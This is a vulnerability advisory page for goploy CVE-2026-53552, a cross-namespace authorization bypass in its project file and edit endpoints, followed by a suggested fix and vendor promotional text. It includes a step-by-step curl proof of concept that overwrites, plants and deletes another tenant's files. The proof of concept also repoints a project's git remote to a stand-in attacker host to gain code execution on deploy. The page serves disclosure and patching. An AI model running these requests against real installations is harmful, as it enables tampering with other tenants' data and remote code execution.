goploy CVE-2026-53552
CRITICALSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Remote, low-complexity foreign-id submission by an authenticated low-priv manager (PR:L) crosses namespace boundaries (S:C); full read/write/delete plus deploy-time RCE justify C:H/I:H/A:H, raising A above the vendor's A:N.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
Project.AddFile, Project.EditFile, Project.RemoveFile, and Project.Edit in cmd/server/api/project/handler.go accept a project or project-file row id from the JSON body and act on it without checking that the project belongs to the caller's namespace. The corresponding model.ProjectFile.GetData and model.Project.GetData queries filter only by row id. A user holding the manager role (or any role that includes the FileSync / EditProject permission) in their own namespace can read, write, or delete files in any project across the install, and can rewrite any project's git remote URL by submitting the foreign id in the body. The git-URL primitive escalates to RCE on the next deploy because Edit runs git remote set-url on the project's working tree.
Affected
zhenorzz/goploy develop HEAD as of 2026-05-27. Verified against the zhenorzz/goploy:1.17.5 Docker image (docker.io/zhenorzz/goploy@sha256:69d08e1d16d7a7167426c89456c4bcef8e077a16554a4067ff258fff26d5cd44).
The four handlers and the model lookups have been in this shape across the file API and project metadata API.
Vulnerable code
cmd/server/api/project/handler.go::AddFile (creates file under any project's directory; body controls projectId):
func (Project) AddFile(gp *server.Goploy) server.Response {
type ReqData struct {
ProjectID int64 `json:"projectId" validate:"required,gt=0"`
Content string `json:"content" validate:"required"`
Filename string `json:"filename" validate:"required"`
}
var reqData ReqData
if err := gp.Decode(&reqData); err != nil { ... }
filePath := path.Join(config.GetProjectFilePath(reqData.ProjectID), reqData.Filename)
// ... os.Create(filePath); file.WriteString(reqData.Content)
id, err := model.ProjectFile{ProjectID: reqData.ProjectID, Filename: reqData.Filename}.AddRow()
}cmd/server/api/project/handler.go::EditFile (overwrites file content; body controls file id, server derives project from the file row):
func (Project) EditFile(gp *server.Goploy) server.Response {
type ReqData struct {
ID int64 `json:"id" validate:"required,gt=0"`
Content string `json:"content" validate:"required"`
}
var reqData ReqData
if err := gp.Decode(&reqData); err != nil { ... }
projectFileData, err := model.ProjectFile{ID: reqData.ID}.GetData()
// ... os.Create(path.Join(config.GetProjectFilePath(projectFileData.ProjectID), projectFileData.Filename))
file.WriteString(reqData.Content)
}cmd/server/api/project/handler.go::RemoveFile (deletes file row + on-disk file by body id):
func (Project) RemoveFile(gp *server.Goploy) server.Response {
type ReqData struct {
ProjectFileID int64 `json:"projectFileId" validate:"required,gt=0"`
}
var reqData ReqData
if err := gp.Decode(&reqData); err != nil { ... }
projectFileData, err := model.ProjectFile{ID: reqData.ProjectFileID}.GetData()
if err := os.Remove(path.Join(config.GetProjectFilePath(projectFileData.ProjectID), projectFileData.Filename)); err != nil { ... }
}cmd/server/api/project/handler.go::Edit (updates any project's metadata; on URL change runs git remote set-url in the project working tree):
func (Project) Edit(gp *server.Goploy) server.Response {
// ... ReqData has ID, Name, URL, Branch, Script, etc.
projectData, err := model.Project{ID: reqData.ID}.GetData()
model.Project{ID: reqData.ID, Name: reqData.Name, URL: reqData.URL, ...}.EditRow()
if reqData.URL != projectData.URL {
srcPath := config.GetProjectPath(projectData.ID)
cmd := exec.Command("git", "remote", "set-url", "origin", reqData.URL)
cmd.Dir = srcPath
}
}internal/model/project_file.go::ProjectFile.GetData filters only by row id, no namespace join:
func (pf ProjectFile) GetData() (ProjectFile, error) {
err := sq.
Select("id, project_id, filename, insert_time, update_time").
From(projectFileTable).
Where(sq.Eq{"id": pf.ID}).
...
}internal/server/route.go::Route.hasPermission checks only namespace-level permission ids; nothing in the request flow verifies that the body-supplied project id belongs to gp.Namespace.ID:
func (r Route) hasPermission(permissionIDs map[int64]struct{}) error {
if len(r.permissionIDs) == 0 { return nil }
for _, permissionID := range r.permissionIDs {
if _, ok := permissionIDs[permissionID]; ok { return nil }
}
return errors.New("no permission")
}Reachable
Any logged-in user assigned the manager role in their own namespace can call /project/addFile, /project/editFile, /project/removeFile, and /project/edit. The seeded manager role (role.id = 1) is granted both FileSync (permission.id = 68) and EditProject (permission.id = 17) by database/goploy.sql. Multi-tenant deployments typically assign manager to each tenant's project owner; once a tenant's manager holds these permissions in their own namespace, they hold them globally for these four endpoints.
Proof of concept
Setup against the published Docker image:
docker network create goploy-net
docker run -d --name goploy-mysql --network goploy-net \
-e MYSQL_ROOT_PASSWORD=goploy123 -e MYSQL_DATABASE=goploy \
mysql:8.0 --default-authentication-plugin=mysql_native_password
# Wait for MySQL, then load schema
docker cp database/goploy.sql goploy-mysql:/tmp/goploy.sql
docker exec goploy-mysql sh -c 'mysql -uroot -pgoploy123 goploy < /tmp/goploy.sql'
# Mount goploy.toml pointing DB at goploy-mysql:3306
docker run -d --name goploy-app --network goploy-net -p 18080:80 \
-v $PWD/repo:/opt/goploy/repository \
zhenorzz/goploy:1.17.5Set up two namespaces and two non-super-manager users, each assigned manager (role_id=1) only in their own namespace:
# Admin login (default account admin / admin!@
# requires first-login change)
curl -s -c /tmp/admin.jar -X POST http://localhost:18080/user/login \
-H 'Content-Type: application/json' \
-d '{"account":"admin","password":"admin!@#","newPassword":"Admin!@#2026"}'
ADMIN_HDR='-b /tmp/admin.jar -H G-N-ID:1 -H Content-Type:application/json'
# Create NS_B
curl -s $ADMIN_HDR -X POST http://localhost:18080/namespace/add -d '{"name":"ns_b"}'
# → {"data":{"id":2}}
# Create alice (id=2) and bob (id=3)
curl -s $ADMIN_HDR -X POST http://localhost:18080/user/add \
-d '{"account":"alice","password":"Alice!@#2026","name":"Alice","contact":"","superManager":0}'
curl -s $ADMIN_HDR -X POST http://localhost:18080/user/add \
-d '{"account":"bob","password":"Bob!@#2026","name":"Bob","contact":"","superManager":0}'
# Assign alice → NS_A (id=1), bob → NS_B (id=2), both as manager (role_id=1)
curl -s $ADMIN_HDR -X POST http://localhost:18080/namespace/addUser \
-d '{"namespaceId":1,"userIds":[2],"roleId":1}'
curl -s $ADMIN_HDR -X POST http://localhost:18080/namespace/addUser \
-d '{"namespaceId":2,"userIds":[3],"roleId":1}'
# As admin in NS_A, create project alice-prod (id=1) with file alice-secrets.yml (id=1)
curl -s $ADMIN_HDR -X POST http://localhost:18080/project/add \
-d '{"name":"alice-prod","repoType":"git","url":"https://github.com/zhenorzz/goploy.git",
"path":"/tmp/deploy/alice","environment":1,"branch":"master","transferType":"rsync",
"transferOption":"-rtv","deployServerMode":"serial",
"script":{"afterPull":{"mode":"","content":""},"afterDeploy":{"mode":"","content":""},
"deployFinish":{"mode":"","content":""}}}'
curl -s $ADMIN_HDR -X POST http://localhost:18080/project/addFile \
-d '{"projectId":1,"filename":"alice-secrets.yml","content":"
# Alice secret\napi_key: ALICE_API_KEY_2026\n"}'
# Bob logs in (first-login change)
curl -s -c /tmp/bob.jar -X POST http://localhost:18080/user/login \
-H 'Content-Type: application/json' \
-d '{"account":"bob","password":"Bob!@#2026","newPassword":"BobBob!@#2026"}'
BOB_HDR='-b /tmp/bob.jar -H G-N-ID:2 -H Content-Type:application/json'Negative control: Bob's own namespace has no projects.
curl -s $BOB_HDR "http://localhost:18080/project/getList?page=1&rows=100"
# → {"code":0,"data":{"list":[]}}Exploit 1 - Bob overwrites Alice's file content:
curl -s $BOB_HDR -X PUT http://localhost:18080/project/editFile \
-d '{"id":1,"content":"OWNED BY BOB\nattacker_namespace: ns_b\n"}'
# → {"code":0,"message":"","data":null}
docker exec goploy-app cat /opt/goploy/repository/repository/project-file/project_1/alice-secrets.yml
# OWNED BY BOB
# attacker_namespace: ns_bExploit 2 - Bob plants a new file in Alice's project directory:
curl -s $BOB_HDR -X POST http://localhost:18080/project/addFile \
-d '{"projectId":1,"filename":".env.attacker","content":"PWN=bob_from_ns_b"}'
# → {"code":0,"message":"","data":{"id":2}}
docker exec goploy-app ls /opt/goploy/repository/repository/project-file/project_1/
# .env.attacker alice-secrets.ymlExploit 3 - Bob deletes Alice's file:
curl -s $BOB_HDR -X DELETE http://localhost:18080/project/removeFile \
-d '{"projectFileId":1}'
# → {"code":0,"message":"","data":null}
# alice-secrets.yml is gone from project_1/.Exploit 4 - Bob rewrites Alice's project git remote URL. On the next deploy, goploy runs git -C <alice-prod-tree> remote set-url origin <attacker-url> and clones / pulls attacker code, leading to RCE under goploy's user:
curl -s $BOB_HDR -X PUT http://localhost:18080/project/edit \
-d '{"id":1,"name":"alice-prod","repoType":"git",
"url":"git@evil.example.com:attacker/payload.git",
"path":"/tmp/deploy/alice","environment":1,"branch":"master",
"transferType":"rsync","transferOption":"-rtv","deployServerMode":"serial",
"script":{"afterPull":{"mode":"","content":""},"afterDeploy":{"mode":"","content":""},
"deployFinish":{"mode":"","content":""}}}'
# → {"code":0,"message":"","data":null}
docker exec goploy-mysql mysql -uroot -pgoploy123 goploy \
-e "SELECT name,url FROM project WHERE id=1;"
# alice-prod | git@evil.example.com:attacker/payload.gitPositive control: Bob editing a file in his own namespace (after creating one) goes through the same code path and succeeds normally - the patch must keep that working.
Suggested fix
Add a namespace-scoped variant of GetData so the model layer requires (id, namespace_id) and switch the four handlers over.
internal/model/project_file.go:
func (pf ProjectFile) GetDataInNamespace(namespaceID int64) (ProjectFile, error) {
var projectFile ProjectFile
err := sq.
Select("pf.id, pf.project_id, pf.filename, pf.insert_time, pf.update_time").
From(projectFileTable + " pf").
Join("project p ON p.id = pf.project_id").
Where(sq.Eq{"pf.id": pf.ID, "p.namespace_id": namespaceID}).
RunWith(DB).
QueryRow().
Scan(&projectFile.ID, &projectFile.ProjectID, &projectFile.Filename,
&projectFile.InsertTime, &projectFile.UpdateTime)
return projectFile, err
}internal/model/project.go: add a parallel Project.GetDataInNamespace that joins on namespace_id.
cmd/server/api/project/handler.go:
EditFileandRemoveFileswitch tomodel.ProjectFile{ID: ...}.GetDataInNamespace(gp.Namespace.ID).AddFilecalls a newmodel.Project{ID: reqData.ProjectID}.GetDataInNamespace(gp.Namespace.ID)precheck beforeos.CreateandAddRow.Editcallsmodel.Project{ID: reqData.ID}.GetDataInNamespace(gp.Namespace.ID)beforeEditRow.
sql.ErrNoRows from the namespace-scoped lookup becomes the correct denial for any cross-namespace id. The same pattern should be applied to other body-id consumers in this file (Remove, SetAutoDeploy, UploadFile, AddTask, EditProcess, etc.) but the four endpoints above are the immediately exploitable ones.
Patch
Fix proposed in https://github.com/zhenorzz/goploy-ghsa-26rh-24rg-j3vv/pull/1. The PR diff adds the namespace-scoped model variants and switches the four exposed handlers to use them.
Credit
Reported by tonghuaroot.
Articles & Coverage 1
AnalysisAI
Cross-namespace privilege escalation in goploy (zhenorzz/goploy through 1.17.5 and develop HEAD) lets any authenticated user holding the low-privilege manager role in their own namespace read, overwrite, plant, or delete project files in ANY other tenant's project, and rewrite any project's git remote URL, because the /project/addFile, /project/editFile, /project/removeFile, and /project/edit handlers act on body-supplied project/file row ids without verifying the target belongs to the caller's namespace. The rewritten git remote escalates to remote code execution on the next deploy, when goploy runs git remote set-url origin <attacker-url> and pulls attacker-controlled code under the goploy service account. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires an authenticated account holding the `manager` role (role id 1) - or any role granting the `FileSync` (permission id 68) or `EditProject` (permission id 17) permission - in the attacker's OWN namespace; no access to the victim's namespace is needed. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The supplied CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, base 9.6 Critical) is well-supported by the description: exploitation is remote over the network, low-complexity (submit a foreign integer id in the JSON body), requires only the seeded low-privilege `manager` role (PR:L), needs no user interaction, and crosses a trust/authorization boundary into other tenants (S:C). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A malicious or compromised tenant owner with the `manager` role in their own namespace enumerates project and file ids (small sequential integers) and submits another tenant's id in the body of `/project/edit`, changing that project's git remote to an attacker-controlled repository containing a malicious deploy script. When the victim tenant next triggers a deploy, goploy runs `git remote set-url` and pulls the attacker's code, executing it as the goploy service account and yielding remote code execution across the install. … |
| Remediation | Upstream fix available (PR/commit); released patched version not independently confirmed - the fix is proposed in https://github.com/zhenorzz/goploy-ghsa-26rh-24rg-j3vv/pull/1, which adds namespace-scoped model variants (e.g. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all goploy installations running version 1.17.5 or earlier; restrict administrative access to goploy; audit recent git remote URL changes and project file modifications for unauthorized alterations. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-26rh-24rg-j3vv